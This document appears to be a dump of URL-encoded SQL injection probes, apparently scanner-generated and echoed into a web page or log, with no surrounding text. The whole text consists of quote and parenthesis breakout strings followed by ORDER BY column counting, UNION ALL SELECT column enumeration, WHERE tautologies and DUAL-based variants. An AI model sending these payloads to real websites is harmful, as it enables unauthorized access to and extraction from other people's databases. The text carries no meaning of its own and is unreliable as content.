-2629%27%29%20UNION%20ALL%20SELECT%202367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%23 -9947%27%29%29%20ORDER%20BY%201%23 -9126%27%29%29%20ORDER%20BY%209842%23 -9641%27%29%29%20UNION%20ALL%20SELECT%202695%23 -1345%27%29%29%20UNION%20ALL%20SELECT%203219%2C3219%23 -3626%27%29%29%20UNION%20ALL%20SELECT%202088%2C2088%2C2088%23 -4192%27%29%29%20UNION%20ALL%20SELECT%203775%2C3775%2C3775%2C3775%23 -4516%27%29%29%20UNION%20ALL%20SELECT%209666%2C9666%2C9666%2C9666%2C9666%23 -2347%27%29%29%20UNION%20ALL%20SELECT%206641%2C6641%2C6641%2C6641%2C6641%2C6641%23 -4522%27%29%29%20UNION%20ALL%20SELECT%205528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%23 -4069%27%29%29%20UNION%20ALL%20SELECT%206802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%23 -8178%27%29%29%20UNION%20ALL%20SELECT%203843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%23 -3805%27%29%29%20UNION%20ALL%20SELECT%205879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%23 -4019%27%29%29%29%20ORDER%20BY%201%23 -4712%27%29%29%29%20ORDER%20BY%202073%23 -3424%27%29%29%29%20UNION%20ALL%20SELECT%206672%23 -6697%27%29%29%29%20UNION%20ALL%20SELECT%204186%2C4186%23 -5723%27%29%29%29%20UNION%20ALL%20SELECT%202895%2C2895%2C2895%23 -3077%27%29%29%29%20UNION%20ALL%20SELECT%205928%2C5928%2C5928%2C5928%23 -4923%27%29%29%29%20UNION%20ALL%20SELECT%209734%2C9734%2C9734%2C9734%2C9734%23 -1580%27%29%29%29%20UNION%20ALL%20SELECT%209213%2C9213%2C9213%2C9213%2C9213%2C9213%23 -4656%27%29%29%29%20UNION%20ALL%20SELECT%207598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%23 -4073%27%29%29%29%20UNION%20ALL%20SELECT%207465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%23 -6537%27%29%29%29%20UNION%20ALL%20SELECT%208411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%23 -3463%27%29%29%29%20UNION%20ALL%20SELECT%202921%2C2921%2C2921%2C2921%2C2921%2C2921%2C2921%2C2921%2C2921%2C2921%23 -9624%27%20ORDER%20BY%201%23 -6564%27%20ORDER%20BY%202507%23 -7209%27%20UNION%20ALL%20SELECT%201871%23 -8461%27%20UNION%20ALL%20SELECT%201642%2C1642%23 -9952%27%20UNION%20ALL%20SELECT%207581%2C7581%2C7581%23 -6452%27%20UNION%20ALL%20SELECT%206045%2C6045%2C6045%2C6045%23 -6586%27%20UNION%20ALL%20SELECT%207768%2C7768%2C7768%2C7768%2C7768%23 -9233%27%20UNION%20ALL%20SELECT%201277%2C1277%2C1277%2C1277%2C1277%2C1277%23 -4221%27%20UNION%20ALL%20SELECT%208892%2C8892%2C8892%2C8892%2C8892%2C8892%2C8892%23 -6314%27%20UNION%20ALL%20SELECT%208403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%23 -9574%27%20UNION%20ALL%20SELECT%205842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%23 -4577%27%20UNION%20ALL%20SELECT%202011%2C2011%2C2011%2C2011%2C2011%2C2011%2C2011%2C2011%2C2011%2C2011%23 -3452%22%29%20ORDER%20BY%201%23 -2486%22%29%20ORDER%20BY%201604%23 -7184%22%29%20UNION%20ALL%20SELECT%209984%23 -1357%22%29%20UNION%20ALL%20SELECT%206525%2C6525%23 -1250%22%29%20UNION%20ALL%20SELECT%204312%2C4312%2C4312%23 -9788%22%29%20UNION%20ALL%20SELECT%206244%2C6244%2C6244%2C6244%23 -3995%22%29%20UNION%20ALL%20SELECT%205380%2C5380%2C5380%2C5380%2C5380%23 -8850%22%29%20UNION%20ALL%20SELECT%204837%2C4837%2C4837%2C4837%2C4837%2C4837%23 -9060%22%29%20UNION%20ALL%20SELECT%208634%2C8634%2C8634%2C8634%2C8634%2C8634%2C8634%23 -2697%22%29%20UNION%20ALL%20SELECT%202296%2C2296%2C2296%2C2296%2C2296%2C2296%2C2296%2C2296%23 -5773%22%29%20UNION%20ALL%20SELECT%204052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%23 -3497%22%29%20UNION%20ALL%20SELECT%207396%2C7396%2C7396%2C7396%2C7396%2C7396%2C7396%2C7396%2C7396%2C7396%23 -2533%22%29%29%20ORDER%20BY%201%23 -5909%22%29%29%20ORDER%20BY%205808%23 -4687%22%29%29%20UNION%20ALL%20SELECT%208834%23 -3807%22%29%29%20UNION%20ALL%20SELECT%205089%2C5089%23 -1928%22%29%29%20UNION%20ALL%20SELECT%202977%2C2977%2C2977%23 -8121%22%29%29%20UNION%20ALL%20SELECT%202387%2C2387%2C2387%2C2387%23 -7319%22%29%29%20UNION%20ALL%20SELECT%205614%2C5614%2C5614%2C5614%2C5614%23 -4966%22%29%29%20UNION%20ALL%20SELECT%202744%2C2744%2C2744%2C2744%2C2744%2C2744%23 -7455%22%29%29%20UNION%20ALL%20SELECT%201519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%23 -4844%22%29%29%20UNION%20ALL%20SELECT%201071%2C1071%2C1071%2C1071%2C1071%2C1071%2C1071%2C1071%23 -2462%22%29%29%20UNION%20ALL%20SELECT%203708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%23 -1984%22%29%29%20UNION%20ALL%20SELECT%206661%2C6661%2C6661%2C6661%2C6661%2C6661%2C6661%2C6661%2C6661%2C6661%23 -5921%22%29%29%29%20ORDER%20BY%201%23 -8905%22%29%29%29%20ORDER%20BY%209611%23 -2024%22%29%29%29%20UNION%20ALL%20SELECT%206624%23 -4364%22%29%29%29%20UNION%20ALL%20SELECT%201739%2C1739%23 -8369%22%29%29%29%20UNION%20ALL%20SELECT%201684%2C1684%2C1684%23 -3281%22%29%29%29%20UNION%20ALL%20SELECT%203767%2C3767%2C3767%2C3767%23 -3959%22%29%29%29%20UNION%20ALL%20SELECT%209090%2C9090%2C9090%2C9090%2C9090%23 -4516%22%29%29%29%20UNION%20ALL%20SELECT%203105%2C3105%2C3105%2C3105%2C3105%2C3105%23 -5422%22%29%29%29%20UNION%20ALL%20SELECT%204377%2C4377%2C4377%2C4377%2C4377%2C4377%2C4377%23 -4017%22%29%29%29%20UNION%20ALL%20SELECT%206781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%23 -9131%22%29%29%29%20UNION%20ALL%20SELECT%204457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%23 -9436%22%29%29%29%20UNION%20ALL%20SELECT%208930%2C8930%2C8930%2C8930%2C8930%2C8930%2C8930%2C8930%2C8930%2C8930%23 -3997%22%20ORDER%20BY%201%23 -1216%22%20ORDER%20BY%209110%23 -5539%22%20UNION%20ALL%20SELECT%202638%23 -9250%22%20UNION%20ALL%20SELECT%202921%2C2921%23 -9175%22%20UNION%20ALL%20SELECT%205675%2C5675%2C5675%23 -6246%22%20UNION%20ALL%20SELECT%204348%2C4348%2C4348%2C4348%23 -3822%22%20UNION%20ALL%20SELECT%205531%2C5531%2C5531%2C5531%2C5531%23 -4151%22%20UNION%20ALL%20SELECT%207698%2C7698%2C7698%2C7698%2C7698%2C7698%23 -8478%22%20UNION%20ALL%20SELECT%208583%2C8583%2C8583%2C8583%2C8583%2C8583%2C8583%23 -7322%22%20UNION%20ALL%20SELECT%209665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%23 -1515%22%20UNION%20ALL%20SELECT%206783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%23 -4317%22%20UNION%20ALL%20SELECT%201606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%23 -7442%22%29%20ORDER%20BY%201%23 -7096%22%29%20ORDER%20BY%207255%23 -9886%22%29%20UNION%20ALL%20SELECT%203984%23 -6103%22%29%20UNION%20ALL%20SELECT%204540%2C4540%23 -1670%22%29%20UNION%20ALL%20SELECT%203854%2C3854%2C3854%23 -8905%22%29%20UNION%20ALL%20SELECT%202133%2C2133%2C2133%2C2133%23 -6507%22%29%20UNION%20ALL%20SELECT%204863%2C4863%2C4863%2C4863%2C4863%23 -5289%22%29%20UNION%20ALL%20SELECT%201544%2C1544%2C1544%2C1544%2C1544%2C1544%23 -8549%22%29%20UNION%20ALL%20SELECT%203717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%23 -4711%22%29%20UNION%20ALL%20SELECT%207408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408%23 -2783%22%29%20UNION%20ALL%20SELECT%205114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%23 -7795%22%29%20UNION%20ALL%20SELECT%203773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%23 -5325%22%29%29%20ORDER%20BY%201%23 -1937%22%29%29%20ORDER%20BY%207413%23 -6601%22%29%29%20UNION%20ALL%20SELECT%208067%23 -8395%22%29%29%20UNION%20ALL%20SELECT%208049%2C8049%23 -1112%22%29%29%20UNION%20ALL%20SELECT%206138%2C6138%2C6138%23 -8905%22%29%29%20UNION%20ALL%20SELECT%207627%2C7627%2C7627%2C7627%23 -4752%22%29%29%20UNION%20ALL%20SELECT%204703%2C4703%2C4703%2C4703%2C4703%23 -2912%22%29%29%20UNION%20ALL%20SELECT%205594%2C5594%2C5594%2C5594%2C5594%2C5594%23 -8129%22%29%29%20UNION%20ALL%20SELECT%202664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%23 -3743%22%29%29%20UNION%20ALL%20SELECT%209222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%23 -7798%22%29%29%20UNION%20ALL%20SELECT%204813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%23 -6525%22%29%29%20UNION%20ALL%20SELECT%205139%2C5139%2C5139%2C5139%2C5139%2C5139%2C5139%2C5139%2C5139%2C5139%23 -4270%22%29%29%29%20ORDER%20BY%201%23 -6276%22%29%29%29%20ORDER%20BY%205851%23 -3941%22%29%29%29%20UNION%20ALL%20SELECT%204702%23 -4973%22%29%29%29%20UNION%20ALL%20SELECT%204101%2C4101%23 -5451%22%29%29%29%20UNION%20ALL%20SELECT%202979%2C2979%2C2979%23 -2316%22%29%29%29%20UNION%20ALL%20SELECT%202274%2C2274%2C2274%2C2274%23 -6556%22%29%29%29%20UNION%20ALL%20SELECT%208924%2C8924%2C8924%2C8924%2C8924%23 -7705%22%29%29%29%20UNION%20ALL%20SELECT%203086%2C3086%2C3086%2C3086%2C3086%2C3086%23 -5737%22%29%29%29%20UNION%20ALL%20SELECT%207966%2C7966%2C7966%2C7966%2C7966%2C7966%2C7966%23 -7572%22%29%29%29%20UNION%20ALL%20SELECT%203202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%23 -3999%22%29%29%29%20UNION%20ALL%20SELECT%201953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%23 -8189%22%29%29%29%20UNION%20ALL%20SELECT%205838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%23 -8919%22%20ORDER%20BY%201%23 -4939%22%20ORDER%20BY%209039%23 -5554%22%20UNION%20ALL%20SELECT%203172%23 -8903%22%20UNION%20ALL%20SELECT%201891%2C1891%23 -8191%22%20UNION%20ALL%20SELECT%208543%2C8543%2C8543%23 -8077%22%20UNION%20ALL%20SELECT%207877%2C7877%2C7877%2C7877%23 -4426%22%20UNION%20ALL%20SELECT%209564%2C9564%2C9564%2C9564%2C9564%23 -6346%22%20UNION%20ALL%20SELECT%206169%2C6169%2C6169%2C6169%2C6169%2C6169%23 -1027%22%20UNION%20ALL%20SELECT%207954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%23 -2569%22%20UNION%20ALL%20SELECT%205860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%23 -9957%22%20UNION%20ALL%20SELECT%206702%2C6702%2C6702%2C6702%2C6702%2C6702%2C6702%2C6702%2C6702%23 -9009%22%20UNION%20ALL%20SELECT%204728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%23 -1128%25%27%29%20ORDER%20BY%201%23 -4678%25%27%29%20ORDER%20BY%205314%23 -6655%25%27%29%20UNION%20ALL%20SELECT%204705%23 -9546%25%27%29%20UNION%20ALL%20SELECT%209103%2C9103%23 -1040%25%27%29%20UNION%20ALL%20SELECT%201372%2C1372%2C1372%23 -9381%25%27%29%20UNION%20ALL%20SELECT%207376%2C7376%2C7376%2C7376%23 -4268%25%27%29%20UNION%20ALL%20SELECT%202943%2C2943%2C2943%2C2943%2C2943%23 -6597%25%27%29%20UNION%20ALL%20SELECT%205747%2C5747%2C5747%2C5747%2C5747%2C5747%23 -5052%25%27%29%20UNION%20ALL%20SELECT%201021%2C1021%2C1021%2C1021%2C1021%2C1021%2C1021%23 -5482%25%27%29%20UNION%20ALL%20SELECT%208324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%23 -8733%25%27%29%20UNION%20ALL%20SELECT%209375%2C9375%2C9375%2C9375%2C9375%2C9375%2C9375%2C9375%2C9375%23 -1804%25%27%29%20UNION%20ALL%20SELECT%204843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%23 -8191%25%27%29%29%20ORDER%20BY%201%23 -4273%25%27%29%29%20ORDER%20BY%204892%23 -4319%25%27%29%29%20UNION%20ALL%20SELECT%206343%23 -5613%25%27%29%29%20UNION%20ALL%20SELECT%201696%2C1696%23 -8726%25%27%29%29%20UNION%20ALL%20SELECT%205323%2C5323%2C5323%23 -3865%25%27%29%29%20UNION%20ALL%20SELECT%209659%2C9659%2C9659%2C9659%23 -3603%25%27%29%29%20UNION%20ALL%20SELECT%203937%2C3937%2C3937%2C3937%2C3937%23 -2586%25%27%29%29%20UNION%20ALL%20SELECT%205049%2C5049%2C5049%2C5049%2C5049%2C5049%23 -4457%25%27%29%29%20UNION%20ALL%20SELECT%209574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%23 -8629%25%27%29%29%20UNION%20ALL%20SELECT%203632%2C3632%2C3632%2C3632%2C3632%2C3632%2C3632%2C3632%23 -7729%25%27%29%29%20UNION%20ALL%20SELECT%205210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%23 -9779%25%27%29%29%20UNION%20ALL%20SELECT%201378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%23 -8304%25%27%29%29%29%20ORDER%20BY%201%23 -9145%25%27%29%29%29%20ORDER%20BY%208261%23 -1388%25%27%29%29%29%20UNION%20ALL%20SELECT%204094%23 -6602%25%27%29%29%29%20UNION%20ALL%20SELECT%205771%2C5771%23 -8521%25%27%29%29%29%20UNION%20ALL%20SELECT%208900%2C8900%2C8900%23 -5300%25%27%29%29%29%20UNION%20ALL%20SELECT%205781%2C5781%2C5781%2C5781%23 -9301%25%27%29%29%29%20UNION%20ALL%20SELECT%203278%2C3278%2C3278%2C3278%2C3278%23 -5742%25%27%29%29%29%20UNION%20ALL%20SELECT%205714%2C5714%2C5714%2C5714%2C5714%2C5714%23 -5135%25%27%29%29%29%20UNION%20ALL%20SELECT%207706%2C7706%2C7706%2C7706%2C7706%2C7706%2C7706%23 -5226%25%27%29%29%29%20UNION%20ALL%20SELECT%201839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%23 -7370%25%27%29%29%29%20UNION%20ALL%20SELECT%209776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%23 -5487%25%27%29%29%29%20UNION%20ALL%20SELECT%204578%2C4578%2C4578%2C4578%2C4578%2C4578%2C4578%2C4578%2C4578%2C4578%23 -2917%25%27%20ORDER%20BY%201%23 -9374%25%27%20ORDER%20BY%206419%23 -7529%25%27%20UNION%20ALL%20SELECT%208883%23 -5650%25%27%20UNION%20ALL%20SELECT%204166%2C4166%23 -7849%25%27%20UNION%20ALL%20SELECT%205161%2C5161%2C5161%23 -8759%25%27%20UNION%20ALL%20SELECT%208973%2C8973%2C8973%2C8973%23 -1467%25%27%20UNION%20ALL%20SELECT%205662%2C5662%2C5662%2C5662%2C5662%23 -7957%25%27%20UNION%20ALL%20SELECT%202531%2C2531%2C2531%2C2531%2C2531%2C2531%23 -9811%25%27%20UNION%20ALL%20SELECT%203655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%23 -8663%25%27%20UNION%20ALL%20SELECT%208020%2C8020%2C8020%2C8020%2C8020%2C8020%2C8020%2C8020%23 -7651%25%27%20UNION%20ALL%20SELECT%203980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%23 -2212%25%27%20UNION%20ALL%20SELECT%207608%2C7608%2C7608%2C7608%2C7608%2C7608%2C7608%2C7608%2C7608%2C7608%23 -6693%00%27%29%20ORDER%20BY%201%23 -9121%00%27%29%20ORDER%20BY%204150%23 -7299%00%27%29%20UNION%20ALL%20SELECT%203222%23 -1671%00%27%29%20UNION%20ALL%20SELECT%203244%2C3244%23 -8161%00%27%29%20UNION%20ALL%20SELECT%209900%2C9900%2C9900%23 -4917%00%27%29%20UNION%20ALL%20SELECT%205385%2C5385%2C5385%2C5385%23 -3355%00%27%29%20UNION%20ALL%20SELECT%208176%2C8176%2C8176%2C8176%2C8176%23 -2905%00%27%29%20UNION%20ALL%20SELECT%206367%2C6367%2C6367%2C6367%2C6367%2C6367%23 -3455%00%27%29%20UNION%20ALL%20SELECT%207236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%23 -8159%00%27%29%20UNION%20ALL%20SELECT%209057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%23 -9645%00%27%29%20UNION%20ALL%20SELECT%202334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%23 -6982%00%27%29%20UNION%20ALL%20SELECT%206591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%23 -3813%00%27%20ORDER%20BY%201%23 -5500%00%27%20ORDER%20BY%204616%23 -1243%00%27%20UNION%20ALL%20SELECT%206915%23 -1004%00%27%20UNION%20ALL%20SELECT%203765%2C3765%23 -9965%00%27%20UNION%20ALL%20SELECT%205366%2C5366%2C5366%23 -4761%00%27%20UNION%20ALL%20SELECT%206415%2C6415%2C6415%2C6415%23 -2556%00%27%20UNION%20ALL%20SELECT%204391%2C4391%2C4391%2C4391%2C4391%23 -9704%00%27%20UNION%20ALL%20SELECT%207880%2C7880%2C7880%2C7880%2C7880%2C7880%23 -7822%00%27%20UNION%20ALL%20SELECT%203866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%23 -7424%00%27%20UNION%20ALL%20SELECT%201482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%23 -9614%00%27%20UNION%20ALL%20SELECT%208933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%23 -9939%00%27%20UNION%20ALL%20SELECT%201309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%23 -3009%27%29%20WHERE%207256%3D7256%20ORDER%20BY%201%23 -3048%27%29%20WHERE%206240%3D6240%20ORDER%20BY%206894%23 -1145%27%29%20WHERE%201023%3D1023%20UNION%20ALL%20SELECT%201023%23 -6342%27%29%20WHERE%207770%3D7770%20UNION%20ALL%20SELECT%207770%2C7770%23 -2704%27%29%20WHERE%202906%3D2906%20UNION%20ALL%20SELECT%202906%2C2906%2C2906%23 -7919%27%29%20WHERE%204223%3D4223%20UNION%20ALL%20SELECT%204223%2C4223%2C4223%2C4223%23 -6795%27%29%20WHERE%208620%3D8620%20UNION%20ALL%20SELECT%208620%2C8620%2C8620%2C8620%2C8620%23 -8922%27%29%20WHERE%203870%3D3870%20UNION%20ALL%20SELECT%203870%2C3870%2C3870%2C3870%2C3870%2C3870%23 -6155%27%29%20WHERE%201980%3D1980%20UNION%20ALL%20SELECT%201980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%23 -9570%27%29%20WHERE%208387%3D8387%20UNION%20ALL%20SELECT%208387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%23 -9701%27%29%20WHERE%202036%3D2036%20UNION%20ALL%20SELECT%202036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%23 -5876%27%29%20WHERE%209058%3D9058%20UNION%20ALL%20SELECT%209058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%23 -2912%22%29%20WHERE%205203%3D5203%20ORDER%20BY%201%23 -4574%22%29%20WHERE%204122%3D4122%20ORDER%20BY%207031%23 -2079%22%29%20WHERE%202477%3D2477%20UNION%20ALL%20SELECT%202477%23 -7374%22%29%20WHERE%205518%3D5518%20UNION%20ALL%20SELECT%205518%2C5518%23 -3703%22%29%20WHERE%206738%3D6738%20UNION%20ALL%20SELECT%206738%2C6738%2C6738%23 -5513%22%29%20WHERE%201970%3D1970%20UNION%20ALL%20SELECT%201970%2C1970%2C1970%2C1970%23 -2470%22%29%20WHERE%205786%3D5786%20UNION%20ALL%20SELECT%205786%2C5786%2C5786%2C5786%2C5786%23 -3175%22%29%20WHERE%207100%3D7100%20UNION%20ALL%20SELECT%207100%2C7100%2C7100%2C7100%2C7100%2C7100%23 -2335%22%29%20WHERE%208305%3D8305%20UNION%20ALL%20SELECT%208305%2C8305%2C8305%2C8305%2C8305%2C8305%2C8305%23 -4618%22%29%20WHERE%208485%3D8485%20UNION%20ALL%20SELECT%208485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%23 -7144%22%29%20WHERE%209418%3D9418%20UNION%20ALL%20SELECT%209418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%23 -1246%22%29%20WHERE%208037%3D8037%20UNION%20ALL%20SELECT%208037%2C8037%2C8037%2C8037%2C8037%2C8037%2C8037%2C8037%2C8037%2C8037%23 -3747%29%20WHERE%202921%3D2921%20ORDER%20BY%201%23 -9203%29%20WHERE%207643%3D7643%20ORDER%20BY%204212%23 -2470%29%20WHERE%208331%3D8331%20UNION%20ALL%20SELECT%208331%23 -1579%29%20WHERE%205945%3D5945%20UNION%20ALL%20SELECT%205945%2C5945%23 -5627%29%20WHERE%201763%3D1763%20UNION%20ALL%20SELECT%201763%2C1763%2C1763%23 -3134%29%20WHERE%204201%3D4201%20UNION%20ALL%20SELECT%204201%2C4201%2C4201%2C4201%23 -3215%29%20WHERE%204390%3D4390%20UNION%20ALL%20SELECT%204390%2C4390%2C4390%2C4390%2C4390%23 -6731%29%20WHERE%204052%3D4052%20UNION%20ALL%20SELECT%204052%2C4052%2C4052%2C4052%2C4052%2C4052%23 -1887%29%20WHERE%206589%3D6589%20UNION%20ALL%20SELECT%206589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%23 -5166%29%20WHERE%208641%3D8641%20UNION%20ALL%20SELECT%208641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%23 -1991%29%20WHERE%205911%3D5911%20UNION%20ALL%20SELECT%205911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%23 -2199%29%20WHERE%207719%3D7719%20UNION%20ALL%20SELECT%207719%2C7719%2C7719%2C7719%2C7719%2C7719%2C7719%2C7719%2C7719%2C7719%23 -3019%27%20WHERE%202112%3D2112%20ORDER%20BY%201%23 -4564%27%20WHERE%201135%3D1135%20ORDER%20BY%209808%23 -8827%27%20WHERE%205306%3D5306%20UNION%20ALL%20SELECT%205306%23 -4518%27%20WHERE%201128%3D1128%20UNION%20ALL%20SELECT%201128%2C1128%23 -5468%27%20WHERE%203052%3D3052%20UNION%20ALL%20SELECT%203052%2C3052%2C3052%23 -9699%27%20WHERE%209631%3D9631%20UNION%20ALL%20SELECT%209631%2C9631%2C9631%2C9631%23 -8971%27%20WHERE%203820%3D3820%20UNION%20ALL%20SELECT%203820%2C3820%2C3820%2C3820%2C3820%23 -1624%27%20WHERE%204787%3D4787%20UNION%20ALL%20SELECT%204787%2C4787%2C4787%2C4787%2C4787%2C4787%23 -2793%27%20WHERE%209324%3D9324%20UNION%20ALL%20SELECT%209324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%23 -2456%27%20WHERE%209279%3D9279%20UNION%20ALL%20SELECT%209279%2C9279%2C9279%2C9279%2C9279%2C9279%2C9279%2C9279%23 -6875%27%20WHERE%208408%3D8408%20UNION%20ALL%20SELECT%208408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%23 -1546%27%20WHERE%201491%3D1491%20UNION%20ALL%20SELECT%201491%2C1491%2C1491%2C1491%2C1491%2C1491%2C1491%2C1491%2C1491%2C1491%23 -6358%22%20WHERE%202857%3D2857%20ORDER%20BY%201%23 -1456%22%20WHERE%202795%3D2795%20ORDER%20BY%203154%23 -8104%22%20WHERE%202397%3D2397%20UNION%20ALL%20SELECT%202397%23 -6284%22%20WHERE%201555%3D1555%20UNION%20ALL%20SELECT%201555%2C1555%23 -2963%22%20WHERE%208559%3D8559%20UNION%20ALL%20SELECT%208559%2C8559%2C8559%23 -1068%22%20WHERE%209912%3D9912%20UNION%20ALL%20SELECT%209912%2C9912%2C9912%2C9912%23 -7520%22%20WHERE%209584%3D9584%20UNION%20ALL%20SELECT%209584%2C9584%2C9584%2C9584%2C9584%23 -6849%22%20WHERE%204911%3D4911%20UNION%20ALL%20SELECT%204911%2C4911%2C4911%2C4911%2C4911%2C4911%23 -2849%22%20WHERE%203212%3D3212%20UNION%20ALL%20SELECT%203212%2C3212%2C3212%2C3212%2C3212%2C3212%2C3212%23 -1527%22%20WHERE%203740%3D3740%20UNION%20ALL%20SELECT%203740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%23 -4814%22%20WHERE%201253%3D1253%20UNION%20ALL%20SELECT%201253%2C1253%2C1253%2C1253%2C1253%2C1253%2C1253%2C1253%2C1253%23 -5980%22%20WHERE%207593%3D7593%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%23 -7800%20WHERE%206276%3D6276%20ORDER%20BY%201%23 -8025%20WHERE%208371%3D8371%20ORDER%20BY%209921%23 -5150%20WHERE%201314%3D1314%20UNION%20ALL%20SELECT%201314%23 -2934%20WHERE%209818%3D9818%20UNION%20ALL%20SELECT%209818%2C9818%23 -3129%20WHERE%203365%3D3365%20UNION%20ALL%20SELECT%203365%2C3365%2C3365%23 -3297%20WHERE%203885%3D3885%20UNION%20ALL%20SELECT%203885%2C3885%2C3885%2C3885%23 -3737%20WHERE%204083%3D4083%20UNION%20ALL%20SELECT%204083%2C4083%2C4083%2C4083%2C4083%23 -8483%20WHERE%208056%3D8056%20UNION%20ALL%20SELECT%208056%2C8056%2C8056%2C8056%2C8056%2C8056%23 -9803%20WHERE%201889%3D1889%20UNION%20ALL%20SELECT%201889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%23 -9424%20WHERE%208644%3D8644%20UNION%20ALL%20SELECT%208644%2C8644%2C8644%2C8644%2C8644%2C8644%2C8644%2C8644%23 -2873%20WHERE%203347%3D3347%20UNION%20ALL%20SELECT%203347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%23 -8233%20WHERE%205233%3D5233%20UNION%20ALL%20SELECT%205233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%23 -9916%27%7C%7C%28SELECT%20%27HKDc%27%20FROM%20DUAL%20WHERE%202776%3D2776%20ORDER%20BY%201%23 -1573%27%7C%7C%28SELECT%20%27OsLJ%27%20FROM%20DUAL%20WHERE%204755%3D4755%20ORDER%20BY%207880%23 -8578%27%7C%7C%28SELECT%20%27lFqL%27%20FROM%20DUAL%20WHERE%205112%3D5112%20UNION%20ALL%20SELECT%205112%23 -1422%27%7C%7C%28SELECT%20%27AvHA%27%20FROM%20DUAL%20WHERE%206188%3D6188%20UNION%20ALL%20SELECT%206188%2C6188%23 -8977%27%7C%7C%28SELECT%20%27HrFZ%27%20FROM%20DUAL%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C6786%2C6786%23 -3287%27%7C%7C%28SELECT%20%27MHMK%27%20FROM%20DUAL%20WHERE%204198%3D4198%20UNION%20ALL%20SELECT%204198%2C4198%2C4198%2C4198%23 -1758%27%7C%7C%28SELECT%20%27EgFh%27%20FROM%20DUAL%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%207031%2C7031%2C7031%2C7031%2C7031%23 -5979%27%7C%7C%28SELECT%20%27EXhl%27%20FROM%20DUAL%20WHERE%209161%3D9161%20UNION%20ALL%20SELECT%209161%2C9161%2C9161%2C9161%2C9161%2C9161%23 -5227%27%7C%7C%28SELECT%20%27sAiL%27%20FROM%20DUAL%20WHERE%202550%3D2550%20UNION%20ALL%20SELECT%202550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%23 